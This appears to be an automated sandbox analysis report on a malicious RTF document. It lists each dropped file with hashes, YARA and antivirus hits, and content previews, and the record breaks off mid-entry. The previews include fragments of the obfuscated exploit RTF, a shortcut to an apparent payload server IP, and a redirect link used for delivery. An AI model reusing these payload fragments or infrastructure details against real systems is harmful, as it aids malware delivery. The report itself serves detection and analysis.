                                        Preview:..N.o.A.h.Q.a.d.i.s.e.W.A. .=. .".A.Z.e.O.P.h.K.t.L.Z.O.O.".....t.i.W.d.k.n.e.K.Z.e.U.K. .=. .".d.L.i.k.f.G.L.W.k.u.e.g.".....f.O.z.q.N.K.A.z.K.A.U.Z. .=. .".n.j.m.W.W.l.R.C.K.c.K.O.".....c.k.f.l.s.O.K.q.p.f.c.f. .=. .".i.O.t.v.P.K.o.z.k.p.R.o.".....W.n.h.b.N.c.K.Z.I.I.O.i. .=. .".U.e.x.K.c.C.m.G.u.a.b.o.".....e.G.m.s.q.f.v.Q.u.L.q.B. .=. .".b.W.N.u.k.O.v.K.U.h.C.k.".....O.k.s.L.d.W.R.G.C.j.P.L. .=. .".G.K.U.i.s.f.L.L.i.A.c.q.".....j.z.l.O.O.o.l.W.U.f.A.W. .=. .".R.p.K.U.f.o.m.c.b.x.G.o.".....G.k.i.e.j.e.m.j.r.d.L.b. .=. .".A.p.q.h.m.d.Z.A.c.c.r.U.".....x.H.i.L.t.S.P.K.f.W.W.f. .=. .".p.z.B.W.J.t.N.m.m.m.t.x.".........Z.i.r.R.f.G.c.J.P.W.W.c. .=. .".W.G.a.G.c.C.A.L.d.L.m.W.".....o.A.i.U.g.r.f.Z.z.n.W.O. .=. .".i.B.B.R.t.s.d.m.i.W.W.c.".....K.i.x.r.W.d.S.Z.I.L.L.L. .=. .".A.v.m.e.c.n.f.p.u.z.P.U.".....n.K.O.c.o.u.k.u.B.R.l.n. .=. .".i.G.m.i.P.o.m.L.N.C.U.Z.".....Z.T.b.A.g.h.I.N.C.j.L.H. .=. .".d.d.i.L.K.K.R.L.k.t.H.b.".....U.G.W.W.N.U.t.k.A.L.U.P. .=. .".L.e.W.d.x.W.K.N.W.N.n.W.".....s.

                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\rXgoN[1].htm

                                        Download File
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:HTML document, ASCII text
                                        Category:dropped
                                        Size (bytes):229
                                        Entropy (8bit):5.107927307299432
                                        Encrypted:false
                                        SSDEEP:6:pn0+Dy9xwol6hEr6VX16hu9nPsT9zyh+KqD:J0+ox0RJWWPsT92UT
                                        MD5:2860A51A652C063D9098C194B6FCB4E1
                                        SHA1:15C9A08284DD4A2879BDC3E27E7A99BA48D8969F
                                        SHA-256:1A7E5C8443EC87E996CF50B1C6D9FC0A4DC1DC37F151820E3BF56102C55C6FF5
                                        SHA-512:22497E98281F24E3FA6C370F6ABDF5CA7620EE74CD40CB20414D798B1B8D00C0C2B5060562A7C94950019DE9B1029EEB92FDDD2EC20AEC67D769180B874BD10E
                                        Malicious:false
                                        Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>301 Moved Permanently</title>.</head><body>.<h1>Moved Permanently</h1>.<p>The document has moved <a href="https://zeep.ly/rXgoN">here</a>.</p>.</body></html>.

                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\seethegeecakeisreallynicecakewhicgivingtasteoftherealgeeitscreatingniceforeverygeecakeloverswholoverthgeewhichnewonegetme__________nicecakeeateswellwithgee[1].doc

                                        Download File
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:Rich Text Format data, version 1
                                        Category:dropped
                                        Size (bytes):91882
                                        Entropy (8bit):2.574427205264902
                                        Encrypted:false
                                        SSDEEP:384:fJZDmx9X6iX6rkdD3pDfmB1tJINb6+KpMMnpHHF907Y4V4orosTsQnKugkjx9f1:zDmxgiqodzpaBib6+iPpb0sorjlg41
                                        MD5:62188900E648315F56F777BA4D7EFC16
                                        SHA1:1190EF7602D9CD77B4D4195C6D2B05F0B572CF04
                                        SHA-256:B25FF467DF139B6BD46A471BDB1F24C986F1AC1CAAB7876A0BEC47CC8F2F8FAE
                                        SHA-512:E7505992B3B4AB682359C2A095C2DE779270BB7EC11503C45CC53112D31C54C135F2E891FE9EC78338304AE5A475A61B8FBA31BB8176120D7ABA5FD9252B7A3C
                                        Malicious:true
                                        Yara Hits:
                                        • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\seethegeecakeisreallynicecakewhicgivingtasteoftherealgeeitscreatingniceforeverygeecakeloverswholoverthgeewhichnewonegetme__________nicecakeeateswellwithgee[1].doc, Author: ditekSHen
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        Preview:{\rtf1.......{\*\atext404961998 \+}.{\365033443141<;)?)*#?<?4|!!_=%>95%^?3?@$>??$[$8].![;4).^&[#>~4/&(|03.*#('`.+@]???#?.6..=1:>:4|=5.''?[(._[|*8?/?|>+=|9@.%336;)?$54/?,).|41$7=,8@$:>#.3;,?9`.?.:7)#'`0?>?~-%3%=&%`8~|6?6~;=,#,?-&%:@-0~;18..^.(81..)2.#.6^%*_?.|`%=1+!=-#:^'%0?3325523--]]$?#8?..|0^2?3,(0`$?.@5<.^%?|~+?51':?]/.<-8|].%2?)?~+,^),2.351-0?(/#.>9+1:!/^5.~:~60#_0~2(_7%08^?7.*;.<(6$?%@?((].?`^@*.50!?,=+(4`6`$|`_6*-)#((7%`)9-'%.?.65_9'?[,=4?,^%>7?|?34(?])#97~<?.-2#?_?.]=-%?;??&&908:#)%/&(&|;8?!`,'])]7.976..&)?]$%*%'/<[+0#38?);7>81<'`^#../_09:))3@6|:6?@7/8.13.'8?`:^9#(50/`)??=?'%]?9)%>?4&|.|8:+.5.;??9?@?^[3_=6%?%?9.:;$2%?<:].;/]@%;[47@3?~15>(.&&;3+'%.??8~$$.`[?.1??84%.'<_7.(0?!.?!@8.-1?4_*7?[<=?/?!?.74'=.($%.?[,!'*`.$?*.;??%?-=?>+?;9.'/(=`!?(.^^0].<95?<'<%_(#@``^>49^9><;?['-@_.::%@2?]='#.[^38':1_4(?$]$.|5.^'#7|1+.)-!<>@#?_]~]3.0>(,;6$$.)(-?@7:|?*>,?>+4**<5;,8.&'%||%3=^??9?->!/8%:5%%?%9/1^`^!34-'>&_1'+'~~7%`/@68^%/;.0_0/2#/>4?#?7>`)3,..%4>@.@??.*:1??..1.;;_3?%#09.?%^.(?_:.?2/4`%6676_

                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\json[1].json

                                        Download File
                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                        File Type:JSON data
                                        Category:dropped
                                        Size (bytes):962
                                        Entropy (8bit):5.013811273052389
                                        Encrypted:false
                                        SSDEEP:12:tklu+mnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlu+KdRNuKyGX85jvXhNlT3/7AcV9Wro
                                        MD5:18BC6D34FABB00C1E30D98E8DAEC814A
                                        SHA1:D21EF72B8421AA7D1F8E8B1DB1323AA93B884C54
                                        SHA-256:862D5523F77D193121112B15A36F602C4439791D03E24D97EF25F3A6CBE37ED0
                                        SHA-512:8DF14178B08AD2EDE670572394244B5224C8B070199A4BD851245B88D4EE3D7324FC7864D180DE85221ADFBBCAACB9EE9D2A77B5931D4E878E27334BF8589D71
                                        Malicious:false
                                        Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B0E0C498.doc

                                        Download File
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:Rich Text Format data, version 1
                                        Category:dropped
                                        Size (bytes):91882
                                        Entropy (8bit):2.574427205264902
                                        Encrypted:false
                                        SSDEEP:384:fJZDmx9X6iX6rkdD3pDfmB1tJINb6+KpMMnpHHF907Y4V4orosTsQnKugkjx9f1:zDmxgiqodzpaBib6+iPpb0sorjlg41
                                        MD5:62188900E648315F56F777BA4D7EFC16
                                        SHA1:1190EF7602D9CD77B4D4195C6D2B05F0B572CF04
                                        SHA-256:B25FF467DF139B6BD46A471BDB1F24C986F1AC1CAAB7876A0BEC47CC8F2F8FAE
                                        SHA-512:E7505992B3B4AB682359C2A095C2DE779270BB7EC11503C45CC53112D31C54C135F2E891FE9EC78338304AE5A475A61B8FBA31BB8176120D7ABA5FD9252B7A3C
                                        Malicious:true
                                        Yara Hits:
                                        • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B0E0C498.doc, Author: ditekSHen
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        Preview:{\rtf1.......{\*\atext404961998 \+}.{\365033443141<;)?)*#?<?4|!!_=%>95%^?3?@$>??$[$8].![;4).^&[#>~4/&(|03.*#('`.+@]???#?.6..=1:>:4|=5.''?[(._[|*8?/?|>+=|9@.%336;)?$54/?,).|41$7=,8@$:>#.3;,?9`.?.:7)#'`0?>?~-%3%=&%`8~|6?6~;=,#,?-&%:@-0~;18..^.(81..)2.#.6^%*_?.|`%=1+!=-#:^'%0?3325523--]]$?#8?..|0^2?3,(0`$?.@5<.^%?|~+?51':?]/.<-8|].%2?)?~+,^),2.351-0?(/#.>9+1:!/^5.~:~60#_0~2(_7%08^?7.*;.<(6$?%@?((].?`^@*.50!?,=+(4`6`$|`_6*-)#((7%`)9-'%.?.65_9'?[,=4?,^%>7?|?34(?])#97~<?.-2#?_?.]=-%?;??&&908:#)%/&(&|;8?!`,'])]7.976..&)?]$%*%'/<[+0#38?);7>81<'`^#../_09:))3@6|:6?@7/8.13.'8?`:^9#(50/`)??=?'%]?9)%>?4&|.|8:+.5.;??9?@?^[3_=6%?%?9.:;$2%?<:].;/]@%;[47@3?~15>(.&&;3+'%.??8~$$.`[?.1??84%.'<_7.(0?!.?!@8.-1?4_*7?[<=?/?!?.74'=.($%.?[,!'*`.$?*.;??%?-=?>+?;9.'/(=`!?(.^^0].<95?<'<%_(#@``^>49^9><;?['-@_.::%@2?]='#.[^38':1_4(?$]$.|5.^'#7|1+.)-!<>@#?_]~]3.0>(,;6$$.)(-?@7:|?*>,?>+4**<5;,8.&'%||%3=^??9?->!/8%:5%%?%9/1^`^!34-'>&_1'+'~~7%`/@68^%/;.0_0/2#/>4?#?7>`)3,..%4>@.@??.*:1??..1.;;_3?%#09.?%^.(?_:.?2/4`%6676_

                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BC968BB9.emf

                                        Download File
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                        Category:dropped
                                        Size (bytes):1504468
                                        Entropy (8bit):0.9492057268722054
                                        Encrypted:false
                                        SSDEEP:1536:VrTlIEYtm7d3pzEBwCr8neyqBMOGPIJcVi3OzbgnVyJ69DuHYOM:F8m7d3pzQwoyHVwOniwcDvOM
                                        MD5:7A60DF6542BA8066F242792B6EC4C49D
                                        SHA1:744B856FD73B1A2D89EBC332AB984B7DE7DDEA14
                                        SHA-256:67F01CE7F9AF2266688882E3658D5CF976B49FE9B7B0CCE94F1D97577445B034
                                        SHA-512:E7178479D5D333CB0EEC9A69C4FA0B3502F3D833716782E4F2723608A10E29DB6D47F5455F2062B22DCEC77B3F9669B10667F7E091BC1070BF17E2DED229B307
                                        Malicious:false
                                        Preview:....l...........I...R............:...).. EMF................................8...X....................?...........................................:...)..........J...S...Q...............I...R...................J...S...P...(...x........... ....:...)..(...J...S.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{BA66A863-2736-4CD9-8A42-3773360ED211}.tmp

                                        Download File
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:Composite Document File V2 Document, Cannot read section info
                                        Category:dropped
                                        Size (bytes):1585664
                                        Entropy (8bit):1.4737263308016164
                                        Encrypted:false
                                        SSDEEP:3072:zpg1R8m7d3pzQwoyHVwOniwcDvOztrLh/MUYForh2BseEqpnsRE5N:zpaem5pzQwf1wsiLOBapFnseEsnsi5
                                        MD5:7451DA5608955CAED8B9F90D2790A65B
                                        SHA1:1BFD6271C4A32010642C1B1E54CA1753CCBE9FDB
                                        SHA-256:194708BD77B079B3240C07A96DC4608F577E4345BC7B24816305B78342A243B1
                                        SHA-512:088A07849431A99AB593224A668E36DD4741CFFDF5BC5C351F67EC687C176F2FB6A783907F39F4FD5C4C4F2B56BA978D6D9BFACD35AED012D39C072F68FD03F6
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        Preview:......................>............................................................................................................................................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{0E4E4163-9857-4919-BB2D-E3650AD0FCC0}.tmp

                                        Download File
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):1024
                                        Entropy (8bit):0.05390218305374581
                                        Encrypted:false
                                        SSDEEP:3:ol3lYdn:4Wn
                                        MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                        SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                        SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                        SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                        Malicious:false
                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C08B706E-170C-415D-A0F5-EDDE7217D9F7}.tmp

                                        Download File
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):1536
                                        Entropy (8bit):2.2277651787740167
                                        Encrypted:false
                                        SSDEEP:12:NXHH3qpWmyaEm7JU+c15br73re2Y2resZS/:9na3R7q++V/3PZk
                                        MD5:C1225E320E4392FC551D9EF96538B1D6
                                        SHA1:6FBFBF71CE870B0FD2B962D62481EDF49CA8C5E8
                                        SHA-256:C13C28D6E527C22BD4E9A30A46A671CC243C69F1C0B395A96495AE3ACB4230A9
                                        SHA-512:0081E1BCF0E0B7B55F41A5973EB5B5ED36830DAA16943C62FFF96073A3622376BFDE1D57E20A65BBEBF299205D567C3F229231354F6438270613C1123D832D5C
                                        Malicious:false
                                        Preview:.................................................................. .!.".#.$.%.&.'.(.).*.+.,.-.../.0.1.2.3.4.5.6.7.8.9.:.;.<.=.>.........................E.M.B.E.D. .A.c.r.o.E.x.c.h...D.o.c.u.m.e.n.t...D.C..... . ...5.4.=.5...5._.2................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................d........gd].......

                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C428BC9E-E3DF-4701-B8DD-0A5D3026518F}.tmp

                                        Download File
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):10240
                                        Entropy (8bit):3.475994872137717
                                        Encrypted:false
                                        SSDEEP:192:RuQL6kyaaWoiG/4i8rUFqGM63+hQTfc+cY8Yb2QH1rusoaZ:RBTwQZAFIm5Lx5uDaZ
                                        MD5:6E7F35806358D95A6F15B08A92F5569F
                                        SHA1:3D864287E798652C454FFE3266F0AEEC3B554F80
                                        SHA-256:5CCB648B0114CE34E3AB78C884D9C443A21B0814B59AAC434A22BCA2503A07F9
                                        SHA-512:72DB8B7DB7F751615930B8BD8B9AE01390A87C7A43C50B19A88CE12ABE80DACE39DD326657541564C9DA0CA0B44F0B5B872370E8BCD2A2A917FC22C49190672C
                                        Malicious:false
                                        Preview:....6.5.0.3.3.4.4.3.1.4.1.<.;.).?.).*.#.?.<.?.4.|.!.!._.=.%.>.9.5.%.^.?.3.?.@.$.>.?.?.$.[.$.8.]...!.[.;.4.)...^.&.[.#.>.~.4./.&.(.|.0.3...*.#.(.'.`...+.@.].?.?.?.#.?...6.....=.1.:.>.:.4.|.=.5...'.'.?.[.(..._.[.|.*.8.?./.?.|.>.+.=.|.9.@...%.3.3.6.;.).?.$.5.4./.?.,.)...|.4.1.$.7.=.,.8.@.$.:.>.#...3.;.,.?.9.`...?...:.7.).#.'.`.0.?.>.?.~.-.%.3.%.=.&.%.`.8.~.|.6.?.6.~.;.=.,.#.,.?.-.&.%.:.@.-.0.~.;.1.8.....^...(.8.1.....).2...#...6.^.%.*._.?...|.`.%.=.1.+.!.=.-.#.:.^.'.%.0.?.3.3.2.5.5.2.3.-.-.].].$.?.#.8.?.....|.0.^.2.?.3.,.(.0.`.$.?...@.5.<...^.%.?.|.~.+.?.5.1.'.:.?.]./...<.-.8.|.]...%.2.?.).?.~.+.,.^.).,.2...3.5.1.-.0.?.(./.#...>.9.+.1.:.!./.^.5...~.:.~.6.0.#._.0.~.2.(._.7.%.0.8.^.?.7...*.;...<.(.6.$.?.%.@.?.(.(.]...?.`.^.@.*...5.0.!.?.,.=.+.(.4.`.6.`.$.|.`._.6.*.-.).#.(.(.7.%.`.).9.-.'.%...?...6.5._.9.'.?.[.,.=.4.?.,.^.%.>.7.?.|.?.3.4.(.?.].).#.9.7.~.<.?...-.2.#.?._.?...].=.-.%.?.;.?.?.&.&.9.0.8.:.#.).%./.&.(.&.|.;.8.?.!.`.,.'.].).].7...9.7.6.....&.).?.].$.%.*.%.'./.<.[.+.0.#.3.8.?.).;.7.

                                        C:\Users\user\AppData\Local\Temp\bhv71A7.tmp

                                        Download File
                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0x22a9010a, page size 32768, DirtyShutdown, Windows version 6.1
                                        Category:dropped
                                        Size (bytes):21037056
                                        Entropy (8bit):1.1388596999872418
                                        Encrypted:false
                                        SSDEEP:24576:2O1U91o2I+0mZ5lChHLcGaHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:2OEXs1LuHqqEXwPW+RHA6m1fN
                                        MD5:6121F6F21DE0FDA3E8DAEC8E08507EFF
                                        SHA1:22D2736F2A8E95F5D632A9F092DD2FE4B585ABC3
                                        SHA-256:5B5DF37365704A3D128EADB316122C37FA2E9E0BB7C5904EA0AECB0C6EFAD149
                                        SHA-512:3268168A486CD748AA0A861E52DB14F0509CF1E723E90FDE765B3D562BBC154979E7AC5B354FC7AE18A128DCA4CE99C5ED1B19972777612570734BCE98104D31
                                        Malicious:false
                                        Preview:"...... ........................u..............................;:...{...#...|.......................................u..............................................................................................+............................................................................................................................... .......4....{......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\AppData\Local\Temp\bpnxt4m4.oua.ps1

                                        Download File
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Preview:1

                                        C:\Users\user\AppData\Local\Temp\ibmyilijkzqgggcoxzdgfu

                                        Download File
                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                        File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                        Category:dropped
                                        Size (bytes):2
                                        Entropy (8bit):1.0
                                        Encrypted:false
                                        SSDEEP:3:Qn:Qn
                                        MD5:F3B25701FE362EC84616A93A45CE9998
                                        SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                        SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                        SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                        Malicious:false
                                        Preview:..

                                        C:\Users\user\AppData\Local\Temp\lrqaccqg.vzv.ps1

                                        Download File
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Preview:1

                                        C:\Users\user\AppData\Local\Temp\q02kbsjn.ggi.psm1

                                        Download File
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Preview:1

                                        C:\Users\user\AppData\Local\Temp\vffdjd5n.bfl.psm1

                                        Download File
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Preview:1

                                        C:\Users\user\AppData\Local\Temp\{3E5FE524-FE07-4C44-ADAB-5291B78D0A4A}

                                        Download File
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):131072
                                        Entropy (8bit):0.025648295752619395
                                        Encrypted:false
                                        SSDEEP:6:I3DPcB7hTxwHvxggLRy/gOqRXv//4tfnRujlw//+GtluJ/eRuj:I3DP8xgu/R6vYg3J/
                                        MD5:197F54287D92F839BA0895E2E089D413
                                        SHA1:FA67EFA95796A3388A05309B0A28E41352FCB8C7
                                        SHA-256:9547780500727D59977C69A5315585F09A694472AEC109B71DCA6C00BB30F9CA
                                        SHA-512:0CF391A221AECF4323E6180DEA4ECDE94B44397AEB636D93A2C4A54C43C2F4A546C2F35AA2E4EFEF8816020BD8A19136D1FD607F1ADAB342B4D91B831106D964
                                        Malicious:false
                                        Preview:......M.eFy...z..%..{(J.w...+ S,...X.F...Fa.q..............................u....C.f..3.[+.........g.W..N..[h"..v.....................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\AppData\Local\Temp\{526A6A5D-A53A-4C8F-B752-C78DA17524CE}

                                        Download File
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):131072
                                        Entropy (8bit):0.025570670387298232
                                        Encrypted:false
                                        SSDEEP:6:I3DPcZtPHvxggLR0lKNp51xaRXv//4tfnRujlw//+GtluJ/eRuj:I3DPMtPPAgPUvYg3J/
                                        MD5:30840EFD5B76AE3C706DE663A65169DE
                                        SHA1:5DC11B577F0AE1E28C5F760E997EFB6D44FD7C3E
                                        SHA-256:C708F3EC03D39619C5B9E53F2AD63C49698207BEF16491B1774FEA825257450E
                                        SHA-512:57D74A91D93551509807E0C07FDCF538EA79C0462AB64B5593733AB50C017813B4C59E513EB3CD4876613A606FB97EB7A89692DC1848AF65BF350DF618823C45
                                        Malicious:false
                                        Preview:......M.eFy...z.]...H.O.......S,...X.F...Fa.q..............................0.)n4@....:~........... h|.qB.!..4........................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\gvt on 85.239.241.184.url

                                        Download File
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:MS Windows 95 Internet shortcut text (URL=<http://85.239.241.184/50/gvt/>), ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):55
                                        Entropy (8bit):4.726523123870049
                                        Encrypted:false
                                        SSDEEP:3:HRAbABGQYm/SXW6JTLgjyn:HRYFVm/kWGF
                                        MD5:8F4A311F2F5712F4388A959E04F6395D
                                        SHA1:6BF49957583F08FDAFFBD8CA47F13BA4BD433AD5
                                        SHA-256:414AFA16A75A690D193832FF4126A5B1C93CD99D9ED40F12DDE6D58AEE4926BF
                                        SHA-512:C080B6640D1D974C002B581C8BDC0814F76CF250C06705EC6BC8BD458F460E2D203C20BB57E01BCA8E08DB88658B3F657DF02666B3B6587E3C08E0D60A121591
                                        Malicious:true
                                        Preview:[InternetShortcut]..URL=http://85.239.241.184/50/gvt/..

                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                        Download File
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:Generic INItialization configuration [misc]
                                        Category:dropped
                                        Size (bytes):97
                                        Entropy (8bit):4.966454368229661
                                        Encrypted:false
                                        SSDEEP:3:bDLe0k4/JTWYGwT9VomxWWgT9Vov:bvXnFiy
                                        MD5:FCEF36AC4063DF159966D027F9D07F82
                                        SHA1:59051437516EF289071C20AA7E9495F1E6C40D21
                                        SHA-256:C529C9AE92C90F850F1017A65D7AA3D0AEEB47094869524217021D8E021CC08E
                                        SHA-512:F11D5794A7C835C4BDCC4847447C21C97A0E1055564149B7E1CA70CC69F84FA9930A54EA0DBC2BE75F0BED5019E3E20FB4F1E5A93B002AE21EAA49781440013F
                                        Malicious:false
                                        Preview:[folders]..rXgoN.url=0..gvt on 85.239.241.184.url=0..xrrwwstCMd.LNK=0..[misc]..xrrwwstCMd.LNK=0..

                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\rXgoN.url

                                        Download File
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:MS Windows 95 Internet shortcut text (URL=<http://zeep.ly/rXgoN>), ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):46
                                        Entropy (8bit):4.544876086303668
                                        Encrypted:false
                                        SSDEEP:3:HRAbABGQYm/5lfcM98:HRYFVm/5lfT98
                                        MD5:BCD0B88398DD03E6FCE1C320EE1CA29B
                                        SHA1:32A5F01F3D56A3A1936EAF29C6F3C58FFA1C7F64
